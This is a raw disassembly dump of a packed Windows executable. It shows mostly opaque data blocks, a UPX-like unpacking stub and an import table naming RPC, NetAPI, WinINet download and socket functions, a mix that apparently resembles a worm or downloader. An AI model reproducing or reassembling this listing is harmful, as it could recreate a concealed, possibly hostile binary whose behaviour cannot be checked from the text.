dd 70520100h, 72745363h, 42676E69h, 69646E69h, 6F43676Eh
dd 736F706Dh, 1004165h, 4372644Eh, 6E65696Ch, 6C614374h
dd 100326Ch, 42637052h, 69646E69h, 7246676Eh, 6565h, 224h
dd 33Ch, 10044FFh, 65474853h, 65705374h, 6C616963h, 646C6F46h
dd 61507265h, 416874h, 23000h, 34800h, 74530100h, 72745372h
dd 1004149h, 53727453h, 57497274h, 23C0000h, 4300000h
dd 4F010000h, 69617462h, 6573556Eh, 65674172h, 7453746Eh
dd 676E6972h, 2470000h, 3540000h, 47010000h, 614C7465h
dd 6E497473h, 49747570h, 6F666Eh, 736F5001h, 73654D74h
dd 65676173h, 47010041h, 6C447465h, 65744967h, 4C01006Dh
dd 5364616Fh, 6E697274h, 1004167h, 57666544h, 6F646E69h
dd 6F725077h, 1004163h, 70736944h, 68637461h, 7373654Dh
dd 41656761h, 72540100h, 6C736E61h, 4D657461h, 61737365h
dd 1006567h, 69676552h, 72657473h, 73616C43h, 1004173h
dd 6D756E45h, 65726854h, 69576461h, 776F646Eh, 47010073h
dd 654D7465h, 67617373h, 1004165h, 61657243h, 69576574h
dd 776F646Eh, 417845h, 25200h, 38400h, 65470100h, 6C694674h
dd 72655665h, 6E6F6973h, 6F666E49h, 56010041h, 75517265h
dd 56797265h, 65756C61h, 47010041h, 69467465h, 6556656Ch
dd 6F697372h, 666E496Eh, 7A69536Fh, 4165h, 25Eh, 394h
dd 746E4901h, 656E7265h, 6F6C4374h, 61486573h, 656C646Eh
dd 6E490100h, 6E726574h, 704F7465h, 416E65h, 746E4901h
dd 656E7265h, 74654774h, 6E6E6F43h, 65746365h, 61745364h
dd 1006574h, 65746E49h, 74656E72h, 64616552h, 656C6946h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 70747448h, 72657551h, 666E4979h, 416Fh, 26Ah, 3B0h
dd 0FF0001FFh, 6FF0002h, 14FF00h, 0FF0073FFh, 0EFF0015h
dd 0DFF00h, 0FF0016FFh, 8FF0034h, 9FF00h, 0FF0004FFh, 13FF006Fh
dd 12FF00h, 0FF0039FFh, 0BFF000Ch, 3FF00h, 41535701h, 74636F49h
dd 97FF006Ch, 0AFF00h, 0FF0010FFh, 17FF0070h, 0
dd 0E4F00000h, 0B4041C15h, 8ECF004h, 0F0CF004h, 0C041404h
dd 84040C04h, 5C040C04h, 5C042C04h, 3 dup(0C040C04h), 40C1004h
dd 9CF0040Ch, 4840401h, 40124F0h, 40C044Ch, 4019CF0h, 40C040Ch
dd 40304F0h, 40154F0h, 0D8F004CCh, 404041Dh, 0C04AC14h
dd 0C041C04h, 28CF004h, 0F0040404h, 6220474h, 1A36213Bh
dd 2D131816h, 151B0F07h, 1F106927h, 0B5D0A18h, 0D080D06h
dd 140F3D12h, 29060F2Dh, 5A10250Eh, 6092C09h, 0D192D0Ah
dd 1320150Bh, 490F090Bh, 0B280A2Bh, 0C070817h, 210E151Bh
dd 0A36061Ah, 190B0C1Dh, 0A531F3Ah, 1E200607h, 120F060Ch
dd 518080Bh, 5060906h, 1016062Bh, 6151C0Ah, 28151A0Bh
dd 2D160708h, 2406070Ah, 230A0E0Ch, 145F0A9h, 4B0D061Ch
dd 0F0A1623h, 1E0E220Ah, 26280F06h, 1E260D06h, 15221950h
dd 0D151221h, 0F0615724h, 483E0102h, 2D1A0B2Dh, 0E192409h
dd 3A440593h, 11055026h, 324D0D17h, 1D054F2Ch, 508C0559h
dd 0B2126C4Dh, 44936405h, 30052321h, 29481125h, 1311301Ch
dd 21162617h, 410C0E25h, 1C171729h, 4F082823h, 0A2B2A11h
dd 241D0B05h, 22070B1Ch, 0A1F3C14h, 0D411107h, 24091956h
dd 6142A27h, 0C810639h, 1D350E34h, 1906253Ah, 19091108h
dd 12091E07h, 2E0C2916h, 7091D0Eh, 201B120Dh, 611F1920h
dd 587F3064h, 5D09114Bh, 162B0A21h, 6F096C0Fh, 0D0C0A06h
dd 8151E1Ah, 6140E07h, 0A0A0A10h, 301F5208h, 0A080694h
dd 35250711h, 80F2010h, 2E313606h, 70F0E08h, 27071119h
dd 8083611h, 0F0060930h, 608012Fh, 37350933h, 193B4722h
dd 1E13082Bh, 17215707h, 0A0B730Ch, 25396C45h, 65135A0Ch
dd 1048243Dh, 19248C07h, 0E362E1Ah, 1E0F1D16h, 190C911Ah
dd 9071D2Eh, 5051309h, 1D13062Bh, 2E090907h, 2F062B14h
dd 17081812h, 19093C08h, 73312D10h, 1C7A2883h, 31362F6Bh
dd 0F091B2Fh, 0D0C212Ah, 153D4F2Eh, 1F301311h, 13111533h
dd 1115332Ah, 15323313h, 80131210h, 3B989B1Dh, 0A140D1Eh
dd 1C451EAAh, 27170F0Dh, 5050B06h, 5050E05h, 5051205h
dd 5050B05h, 0D05050Dh, 6280505h, 5050807h, 0D151105h
dd 100D1512h, 163F1B12h, 65140707h, 305E1238h, 3B42141Ah
dd 1E08050Ah, 1312240Eh, 25270C8Eh, 100C0718h, 3B3F1307h
dd 70D151Dh, 0B421D47h, 61D2E10h, 800D2B30h, 30214C0Eh
dd 0D34250Fh, 250D341Eh, 0F255D06h, 8452F30h, 10122157h
dd 252A070Ah, 15240906h, 0A110B0Bh, 17310E24h, 2A053615h
dd 21170711h, 6280E14h, 0E141409h, 2E0E0A0Bh, 602CCE1Fh
dd 0C08152Ah, 1A1B0E14h, 14111406h, 1626072Ah, 38301C0Eh
dd 31060706h, 7142D07h, 1222070Dh, 91F190Bh, 17171E29h
dd 1310285Bh, 295D1116h, 1D093D23h, 4334440Bh, 38352125h
dd 9151D19h, 2B265D13h, 506111Eh, 16201B08h, 52051505h
dd 2706091Bh, 8519110Ah, 1C070605h, 14249437h, 8090506h
dd 240E1A5Dh, 26480E19h, 9184D08h, 100F1C0Fh, 210E360Fh
dd 14087318h, 0E121F19h, 190D5B10h, 0B08141Ah, 200E0634h
dd 28071D35h, 60E0611h, 5111E0Ah, 2E0C1209h, 0D881733h
dd 1A380606h, 18600A24h, 2B061223h, 0E080620h, 100B100Ah
dd 1A060610h, 1A073B4Eh, 19060B23h, 7080635h, 80070822h
dd 0C0C1409h, 1D0C0606h, 7060814h, 1A050610h, 723320Ah
dd 4B160D0Bh, 11101409h, 0A0B54A3h, 7080E1Bh, 99160908h
dd 0D06060Bh, 14090509h, 908110Ch, 807080Eh, 9981209h
dd 40071C06h, 1C090509h, 2D060607h, 130E0A0Eh, 710060Ah
dd 35051021h, 150D1F1Dh, 2A262061h, 0B261311h, 61F0909h
dd 11093F17h, 0E0C1113h, 1A0E2E0Fh, 28461631h, 6716370Eh
dd 0D1C0912h, 0B0A1718h, 0A121419h, 1311131Dh, 0C1E1A1Ah
dd 9181B08h, 12190E1Ah, 491A3C09h, 0A08060Ah, 0A1F0F38h
dd 0E1E0C0Eh, 29072D0Ch, 4F053B10h, 530D1957h, 23063C0Ah
dd 116E062Dh, 223B0905h, 50F062Fh, 1D2F0666h, 0C0B1205h
dd 1509061Bh, 0A071111h, 180E1407h, 2F5B1629h, 28085A13h
dd 4113081Ah, 22045AF0h, 3C0E3C39h, 707940Ch, 0E1B150Dh
dd 12181212h, 11321312h, 2C3F1209h, 150E1305h, 746B42Ch
dd 0E171311h, 2B0E0E0Eh, 12180820h, 1590080Ah, 3406062Ah
dd 90B1F1Ch, 12063A09h, 0E130D21h, 0D420C14h, 130F0E0Eh
dd 0D12261Ah, 19112434h, 0D0C0708h, 6190607h, 807080Ch
dd 14120B0Dh, 0C1C0F1Eh, 1D051317h, 6381A05h, 33292207h
dd 90A0788h, 19090919h, 431E0909h, 21100908h, 3C1E140Eh
dd 11100910h, 0F0B01D0Fh, 0B2F00174h, 350F008h, 0D9F04B0Eh
dd 0D2F0DD01h, 4C1F4909h, 154F07Ah, 64796E16h, 0F0345910h
dd 0D84B0145h, 14232052h, 0A7F03D7Ah, 57F03104h, 5D6F009h
dd 0F0024BF0h, 32F004D0h, 5D4F001h, 0Dh dup(4040404h)
dd 0F0E30404h, 0F01A0172h, 523A023Fh, 71307CEh, 5130505h
dd 90A1C05h, 90A1E2Bh, 7142B2Bh, 24071421h, 0C200809h
dd 1320361Eh, 1E0A0C1Fh, 32882008h, 3C07154Dh, 6AF04747h
dd 5A214903h, 19196C11h, 135A1919h, 9361724h, 1207072Fh
dd 91B0AAAh, 2C1E727Fh, 331E6860h, 108B0B80h, 7A41922h
dd 120E1630h, 102F00Dh, 53B2229h, 19124D0Ch, 573F1F0Ch
dd 0A57237Dh, 11287B2Ch, 92B2211h, 5E071A29h, 19151728h
dd 71B6407h, 7070A0Ah, 14070707h, 1A220A0Ah, 13461907h
dd 230C0A09h, 4F19071Ah, 0C250F11h, 26272A22h, 27272723h
dd 5815071Ah, 0C0A0913h, 2C2B0C23h, 0F0130719h, 0F0550869h
dd 0F0D10219h, 0C550018Bh, 1302EFF0h, 41036CF0h, 0F0091A69h
dd 60600F9h, 6060606h, 390606E0h, 0D0B0608h, 5050E08h
dd 0A0D0B05h, 22060C15h, 61D5C12h, 6 dup(6060606h), 5060606h
dd 41AB7F0h, 3Dh dup(4040404h), 8040404h, 0Fh dup(4040404h)
dd 0F0040404h, 40405C0h, 5 dup(4040404h), 0F0040404h, 4040210h
dd 5 dup(4040404h), 0C040404h, 18040404h, 455000h, 3014C00h
dd 0DFCF7700h, 3Dh, 0
dd 0E00E000h, 4010B21h, 18C0000h, 2A0000h, 0
dd 1840C00h, 100000h, 1A00000h, 0
dd 100010h, 20000h, 400h, 2000500h, 400h, 0
dd 1E00000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 185A400h, 14000h, 6 dup(0)
dd 1C00000h, 108000h, 0Ch dup(0)
dd 100000h, 43800h, 6 dup(0)
dd 65742E00h, 7478h, 18ABA00h, 100000h, 18C0000h, 40000h
dd 3 dup(0)
dd 2000h, 61642E60h, 6174h, 134C00h, 1A00000h, 100000h
dd 1900000h, 3 dup(0)
dd 4000h, 65722EC0h, 636F6Ch, 140400h, 1C00000h, 160000h
dd 1A00000h, 3 dup(0)
dd 4000h, 1D00042h, 18B1C00h, 1DE7200h, 0E69D0000h, 1570001h
dd 0F3BC2657h, 756C4623h, 40C6873h, 0CD91C6CDh, 0D241103Fh
dd 0E1552CE2h, 57029B68h, 5C02574Eh, 0B30923D9h, 0D411467h
dd 439D7D80h, 57176CB9h, 0B34FB935h, 5F40EA62h, 6D56EE69h
dd 0D18F1AD0h, 5F14610Ah, 0D106466h, 0AB30AD86h, 937DC0Dh
dd 1736F66Eh, 409A4A2Dh, 0DA6208CCh, 47880B16h, 14096108h
dd 1EE866CCh, 67283D69h, 0CDBB8186h, 166B876Dh, 774C6905h
dd 6CCA7363h, 0C40D1A1h, 66A05E70h, 3C9E571Eh, 7970637Bh
dd 61706D07h, 0E4592774h, 300A39CEh, 72776C18h, 7D8D8310h
dd 6E21412Fh, 66926D3Ah, 22D66F6h, 1F0E045Bh, 0DEF72349h
dd 6107261Bh, 87784E40h, 137D586Eh, 5E75FC6Ch, 3F158B6Ch
dd 774C6CDh, 1D8C5A33h, 6E9507F6h, 36C734Ch, 898F66E6h
dd 6EC64905h, 61B37856h, 43A74AC7h, 17B3B93Dh, 1112651Bh
dd 9C3C585Fh, 7109E166h, 70BEF0F5h, 4BC28F63h, 666675D4h
dd 53115275h, 6C1F468Eh, 4AF9654Ah, 0D918C08Ah, 6D126463h
dd 2BD96313h, 631202E6h, 0D8E1F61Fh, 570E980Eh, 0EF61886Bh
dd 0EDC147A7h, 20279EAh, 0C66D321Bh, 1592595Bh, 0CAC91B85h
dd 313470E7h, 36295527h, 3761635Bh, 100C50A8h, 0B2CB2D03h
dd 207FF5Dh, 9020608h, 0B3607E26h, 3281917h, 42637092h
dd 341AA0AFh, 10E87117h, 0A1160D8Bh, 1D41106Bh, 7A67512h
dd 19DF3309h, 2AA9144Eh, 6CF3F70Ah, 4A7D8585h, 78304732h
dd 0D7455524h, 40443CD3h, 0E4445848h, 0C7979526h, 0A916CD3Bh
dd 48308561h, 0B26E0D64h, 4149029Dh, 0B3D5709h, 15AD0E30h
dd 57EC083Ah, 0BD9B644h, 3C907D80h, 0D582D447h, 0F80F5469h
dd 30713345h, 0A3C4466Fh, 0AB970B07h, 68A14EA6h, 9B34676Ch
dd 6949A391h, 158A40A6h, 66FD2344h, 5236856Bh, 7029C931h
dd 8C1BF98h, 0C03A65A0h, 0B0562D47h, 25091265h, 48871293h
dd 0C85015B4h, 0C59B2CEEh, 41B74A6Ch, 26CD6374h, 52391BB0h
dd 560B84B6h, 9408820Fh, 0E59760B8h, 980D2EDCh, 0D34E2441h
dd 46701ABDh, 402945Eh, 3B40800Bh, 5B2C0F65h, 0E415A14h
dd 0B9001618h, 0A936474Dh, 294D9D80h, 0EADB3B37h, 2C55474Ah
dd 707D483Eh, 21669E95h, 6ADBA416h, 0B2CB01B0h, 544E3C7Dh
dd 15730214h, 0B1B2360Eh, 6F160D2Ch, 0CB020934h, 4CB2CB2h
dd 3912136Fh, 0B5DAB50Ch, 0F6030B2Ch, 0B2784153h, 88B6DB2Ch
dd 2970C6Ch, 0F670100Ah, 17C59F4Bh, 15E4F029h, 0F004B406h
dd 0AC0308ECh, 0CFEEBB9h, 414040Fh, 384010Ch, 0C2C045Ch
dd 0FED6CB01h, 0F0041006h, 51E019Ch, 0DB2D4C24h, 150D60B1h
dd 540B0304h, 0BBAFDCCCh, 1DD805BDh, 0AC140004h, 8C181C14h
dd 7FFF0E02h, 22BD28A1h, 36213B06h, 1318161Ah, 1B0F072Dh
dd 0FFFFFF15h, 106927FFh, 5D0A181Fh, 80D060Bh, 0F3D120Dh
dd 60F2D14h, 10250E29h, 92C095Ah, 192D0A06h, 0FF6FFF0Dh
dd 20150BFFh, 0F090B13h, 280A2B49h, 708170Bh, 210E310Ch
dd 0A36061Ah, 190B0C1Dh, 0FF6FFF3Ah, 0A531FFFh, 1E200607h
dd 120F060Ch, 518080Bh, 2B053206h, 0A101606h, 0B06151Ch
dd 0BBFF6F1Ah, 2E2815DBh, 24202D16h, 230A0E0Ch, 145F0A9h
dd 234B641Ch, 0BB7FFA16h, 0A0F0AFDh, 321E0E22h, 260E2628h
dd 2219501Eh, 15122115h, 0B7FF240Dh, 8607B56Fh, 2D483E01h
dd 24092D38h, 5930E19h, 0FF263A44h, 50FFFFFFh, 0D171105h
dd 4F2C324Dh, 5591D05h, 6C4D508Ch, 6405B212h, 23214493h
dd 11253005h, 6F1C2948h, 30FFFF6Fh, 26171311h, 0E252116h
dd 1729410Ch, 71231C17h, 0A92A114Fh, 0FF1D0B05h, 24FF6FDBh
dd 22070B1Ch, 7E1F3C14h, 560D4111h, 2A275119h, 6390614h
dd 0DF340C81h, 0EFFFFFEh, 253A1D35h, 11081906h, 1E071909h
dd 29161209h, 1D0E2E0Ch, 1BFC0709h, 0C2192020h, 1F8DF6FFh
dd 587F3010h, 215D1B4Bh, 0F162B0Ah, 46F096Ch, 0FDB6B5BFh
dd 1E1A0D0Ch, 3F0ECA15h, 520800D8h, 5594301Fh, 6FFE171h
dd 7110A08h, 20103525h, 310A080Fh, 0DFC2F62Eh, 1907456Eh
dd 36112710h, 3300808h, 16012FF0h, 0FFFFFFFFh, 37350933h
dd 193B4722h, 1E13082Bh, 17215707h, 0A0B730Ch, 25396C45h
dd 65135A0Ch, 0E148243Dh, 10EDFFFFh, 1AE48C07h, 160E362Eh
dd 1A1E0F1Dh, 2E190C91h, 909071Dh, 6D3F0513h, 13AFDBE1h
dd 8142E09h, 818122Fh, 0DBA73C72h, 10FFDB85h, 8373312Dh
dd 6B1C7A28h, 1B2F6C2Fh, 93212A8Ch, 0EEBD4B2Eh, 153D4FEDh
dd 331F30FDh, 94042A05h, 0FFF0AD15h, 131210FFh, 989B1D80h
dd 140D1E3Bh, 451EAA0Ah, 170F0D1Ch, 7D538827h, 5DD33ACh
dd 0B12030Eh, 628020Dh, 9BFF0807h, 110FD0A1h, 1B367A77h
dd 707163Fh, 12386514h, 0FC2FB7E1h, 141A305Eh, 8403B42h
dd 4C240E1Eh, 25270C8Eh, 0FDBFF218h, 13AB5BEDh, 271D3B3Fh
dd 421D4707h, 6A8100Bh, 800D2B30h, 0FFB42FF6h, 30214C0Eh
dd 0D34250Fh, 5D4D021Eh, 2F300F25h, 0FFE60845h, 12C2ED0Bh
dd 0F2A0722h, 0B0B156Eh, 0E240A11h, 0DDA11731h, 3615F0BEh
dd 171A2A05h, 730E1421h, 5051409h, 7F85B637h, 0CE1F2E0Eh
dd 522A602Ch, 4A1B0D0Ch, 6DF81114h, 2A14E161h, 0CC0EC407h
dd 31069438h, 0FF142D07h, 8B5F2F0Bh, 0B122207h, 0D41E2909h
dd 1310285Bh, 295D1116h, 0F685FD23h, 1D093DFFh, 4334440Bh
dd 38352125h, 5D2A8C19h, 111E2B26h, 7E170B06h, 16B6A9A1h
dd 52051505h, 94270616h, 0F6FC7719h, 440585DBh, 2494371Ch
dd 8091914h, 490E1A5Dh, 0B7082648h, 4DC2F85Fh, 0F1C3418h
dd 216E0F10h, 14087318h, 6C0E125Ah, 10F6FE37h, 0EB190D5Bh
dd 6340B08h, 711200Eh, 0FF0E4A28h, 0EA2B5B1Bh, 0F123550h
dd 0D881733h, 1A380606h, 0A36DB24h, 18600AFFh, 2B061223h
dd 10C1EF20h, 0AD1410FAh, 1A7F4BB5h, 1A073B4Eh, 35192D23h
dd 0B702A513h, 80B76ED6h, 160C0CD3h, 784A1D0Ch, 6F1A051Fh
dd 0AFF6FB7h, 0B072332h, 174B160Dh, 54A31110h, 240E1BEDh
dd 1D160908h, 99CBDD6Bh, 5090D0Bh, 120D112Dh, 6DBC9812h
dd 1CB1BDCDh, 5134007h, 0E602D1Bh, 0F0BA0A13h, 7616FB7h
dd 8E051021h, 61150D1Fh, 13372620h, 0DB4B1B26h, 1F097A5Fh
dd 93F1706h, 0F45110Ah, 0C2E91AA9h, 1631FFB7h, 370E2846h
dd 36126716h, 0A17180Dh, 8B121426h, 5B8D856Bh, 0A41A131Ch
dd 0F2E70B0Ch, 6DF1D8D4h, 1A3C1A19h, 38A30A49h, 0FD2AFF0Fh
dd 1E1AB6A5h, 1029E902h, 574F053Bh, 0DDD2E3CEh, 63CB05Fh
dd 6E062D23h, 2F223BE8h, 66660584h, 6369428Dh, 0D70B1B1Dh
dd 0FF1B449Dh, 0AA80B97h, 16291807h, 5A132F5Bh, 0BB1A2808h
dd 0FE35AD41h, 305AF0D6h, 3C0E3C39h, 9521940Ch, 6F6FFECDh
dd 294128Dh, 0BF113213h, 13052C3Fh, 0B42C150Eh, 0AB5B0746h
dd 0E859AE0h, 8C032700h, 0EEFB5B08h, 2A1590EDh, 1F1C34CFh
dd 12063ABAh, 0F4240D21h, 0DF855C42h, 0F1E0DB6h, 0D1226A3h
dd 46A42434h, 142850CBh, 73542E2h, 5C6B6360h, 1E141278h
dd 0FB170C9Ch, 0C2021A87h, 22BDA36Fh, 86883329h, 1E0209F4h
dd 0F5BF2843h, 2110EDEDh, 103C1E40h, 1D0F1107h, 0F001BFB0h
dd 0FAF008B2h, 50FFFEBBh, 0F04B0E03h, 0F0DD01D9h, 1F4909D2h
dd 16F07A4Ch, 1064796Eh, 0FFEB3459h, 4B65EFFFh, 232052D8h
dd 0F03D7A14h
dd 0F03104A7h, 0D6F00957h, 24BF005h, 7FFAD0F0h, 326DEC82h
dd 405D43Ah, 72F0E300h, 0D6F01A01h, 3FFA5A54h, 0CE523A02h
dd 0A838070Ch, 6DB1A31Ch, 3808D74h, 221AF2Bh, 0B02E3524h
dd 69206DB0h, 0C1F2B36h, 0E808DF45h, 32880ABFh, 3C07154Dh
dd 49E84747h, 71115A21h, 6CDC97E1h, 24F80019h, 2F093617h
dd 0D2AA1246h, 15BE97FFh, 1E727F09h, 331E6804h, 108B0B80h
dd 7A41922h, 617F0130h, 11C8503h, 0CA82229h, 0C19124Dh
dd 1BD2FA1Fh, 7D573FFFh, 2C0A5723h, 22119A7Bh, 71A0B2Bh
dd 50AF285Eh, 0B34D55B8h, 0A51D1B64h, 0DF5B7200h, 220714B6h
dd 13461915h, 823A309h, 0D4BFDADCh, 220C90FBh, 2326272Ah
dd 15180027h, 6FE85E58h, 2C2B0C8Fh, 69F01334h, 0F05508h
dd 2F8BF0D1h, 282DF6FCh, 2EFF0C5h, 41036C10h, 0F91D1A69h
dd 68DA0600h, 0E000636Ch, 0B9C23902h, 0E352D208h, 0A062BF6h
dd 5C84D515h, 7E4A8EBh, 0F00500B2h, 0B0041AB7h, 886CA87h
dd 5C0F03Fh, 214DD51Bh, 0C0210AFh, 0FE491803h, 3F44049h
dd 0DFCF7700h, 0A005523Dh, 0D143DC5Ah, 0CD54048Fh, 0CF42A8Ch
dd 3BAC0184h, 1A02392h, 3C040805h, 9B37AA02h, 571E1401h
dd 0F44ABFC8h, 185A4h, 25C00140h, 1F2157Fh, 10108000h
dd 4380000h, 4F239006h, 8C018ABAh, 7606001h, 4CCCA809h
dd 0EE54FB13h, 902BBEC2h, 67A540B0h, 0A4048285h, 9100B325h
dd 16B35404h, 0BC00A42Fh, 1BD0DBF9h, 18B1Ch, 0E69DDE72h
dd 1, 0
dd 0FF1200h, 2 dup(0)
; ---------------------------------------------------------------------------
cmp byte ptr [esp+8], 1
jnz loc_9C038D
pusha
mov esi, 9B2000h
lea edi, [esi-11000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_9C01EA
; ---------------------------------------------------------------------------
align 10h
loc_9C01E0: ; CODE XREF: .text:loc_9C01F1�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_9C01E6: ; CODE XREF: .text:009C027E�j
; .text:009C0295�j
add ebx, ebx
jnz short loc_9C01F1
loc_9C01EA: ; CODE XREF: .text:009C01DB�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_9C01F1: ; CODE XREF: .text:009C01E8�j
jb short loc_9C01E0
mov eax, 1
loc_9C01F8: ; CODE XREF: .text:009C0207�j
; .text:009C0212�j
add ebx, ebx
jnz short loc_9C0203
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_9C0203: ; CODE XREF: .text:009C01FA�j
adc eax, eax
add ebx, ebx
jnb short loc_9C01F8
jnz short loc_9C0214
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_9C01F8
loc_9C0214: ; CODE XREF: .text:009C0209�j
xor ecx, ecx
sub eax, 3
jb short loc_9C0228
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_9C029A
mov ebp, eax
loc_9C0228: ; CODE XREF: .text:009C0219�j
add ebx, ebx
jnz short loc_9C0233
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_9C0233: ; CODE XREF: .text:009C022A�j
adc ecx, ecx
add ebx, ebx
jnz short loc_9C0240
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_9C0240: ; CODE XREF: .text:009C0237�j
adc ecx, ecx
jnz short loc_9C0264
inc ecx
loc_9C0245: ; CODE XREF: .text:009C0254�j
; .text:009C025F�j
add ebx, ebx
jnz short loc_9C0250
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_9C0250: ; CODE XREF: .text:009C0247�j
adc ecx, ecx
add ebx, ebx
jnb short loc_9C0245
jnz short loc_9C0261
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_9C0245
loc_9C0261: ; CODE XREF: .text:009C0256�j
add ecx, 2
loc_9C0264: ; CODE XREF: .text:009C0242�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_9C0284
loc_9C0275: ; CODE XREF: .text:009C027C�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_9C0275
jmp loc_9C01E6
; ---------------------------------------------------------------------------
align 4
loc_9C0284: ; CODE XREF: .text:009C0273�j
; .text:009C0291�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_9C0284
add edi, ecx
jmp loc_9C01E6
; ---------------------------------------------------------------------------
loc_9C029A: ; CODE XREF: .text:009C0224�j
pop esi
mov edi, esi
mov ecx, 4E3h
loc_9C02A2: ; CODE XREF: .text:009C02A9�j
; .text:009C02AE�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_9C02A7: ; CODE XREF: .text:009C02CC�j
cmp al, 1
ja short loc_9C02A2
cmp byte ptr [edi], 0Bh
jnz short loc_9C02A2
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_9C02A7
lea edi, [esi+1D000h]
loc_9C02D4: ; CODE XREF: .text:009C02F6�j
mov eax, [edi]
or eax, eax
jz short loc_9C031F
mov ebx, [edi+4]
lea eax, [eax+esi+20000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+20140h]
xchg eax, ebp
loc_9C02F1: ; CODE XREF: .text:009C0317�j
mov al, [edi]
inc edi
or al, al
jz short loc_9C02D4
mov ecx, edi
jns short near ptr loc_9C0302+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_9C0302: ; CODE XREF: .text:009C02FA�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+20144h]
or eax, eax
jz short loc_9C0319
mov [ebx], eax
add ebx, 4
jmp short loc_9C02F1
; ---------------------------------------------------------------------------
loc_9C0319: ; CODE XREF: .text:009C0310�j
popa
xor eax, eax
retn 0Ch
; ---------------------------------------------------------------------------
loc_9C031F: ; CODE XREF: .text:009C02D8�j
add edi, 4
lea ebx, [esi-4]
loc_9C0325: ; CODE XREF: .text:009C0341�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_9C0350
cmp al, 0EFh
ja short loc_9C0343
loc_9C0332: ; CODE XREF: .text:009C034E�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_9C0325
; ---------------------------------------------------------------------------
loc_9C0343: ; CODE XREF: .text:009C0330�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_9C0332
; ---------------------------------------------------------------------------
loc_9C0350: ; CODE XREF: .text:009C032C�j
mov ebp, [esi+20148h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+22Fh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_9C0384: ; CODE XREF: .text:009C0388�j
push 0
cmp esp, eax
jnz short loc_9C0384
sub esp, 0FFFFFF80h
loc_9C038D: ; CODE XREF: .text:009C01C5�j
jmp start
; ---------------------------------------------------------------------------
align 4
dd 31Eh dup(0)
dd 211C8h, 21140h, 3 dup(0)
dd 211D5h, 21158h, 3 dup(0)
dd 211E2h, 21160h, 3 dup(0)
dd 211EAh, 21168h, 3 dup(0)
dd 211F5h, 21170h, 3 dup(0)
dd 21202h, 21178h, 3 dup(0)
dd 2120Ch, 21180h, 3 dup(0)
dd 21219h, 21188h, 3 dup(0)
dd 21224h, 21190h, 3 dup(0)
dd 21230h, 21198h, 3 dup(0)
dd 2123Ch, 211A0h, 3 dup(0)
dd 21247h, 211A8h, 3 dup(0)
dd 21252h, 211B0h, 3 dup(0)
dd 2125Eh, 211B8h, 3 dup(0)
dd 2126Ah, 211C0h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C801AD0h, 7C809A51h, 7C809AE4h
dd 0
dd 77DD7A80h, 0
dd 71B2578Ch, 0
dd 77C36BD0h, 0
dd 5B894541h, 0
dd 774FEE36h, 0
dd 77124920h, 0
dd 77EF34D0h, 0
dd 7C9EC6A0h, 0
dd 77F8C48Eh, 0
dd 78161DFDh, 0
dd 7E423DCEh, 0
dd 77C018BAh, 0
dd 7806C865h, 0
dd 71AB3B91h, 0
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 41h, 44h, 56h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 504Dh
db 52h ; R
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 534Dh
db 56h ; V
db 43h, 52h, 54h
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 4Eh, 45h, 54h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 6C6Fh
db 65h ; e
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 4Fh ; O
db 4Ch, 45h, 41h
db 55h ; U
db 54h, 33h, 32h
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 52h, 50h, 43h
db 52h ; R
db 54h, 34h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 53h ; S
db 48h, 45h, 4Ch
db 4Ch ; L
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 53h ; S
db 48h, 4Ch, 57h
db 41h ; A
db 50h, 49h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 75h ; u
db 72h, 6Ch, 6Dh
db 6Fh ; o
db 6Eh, 2Eh, 64h
db 6Ch ; l
db 6Ch, 0, 55h
db 53h ; S
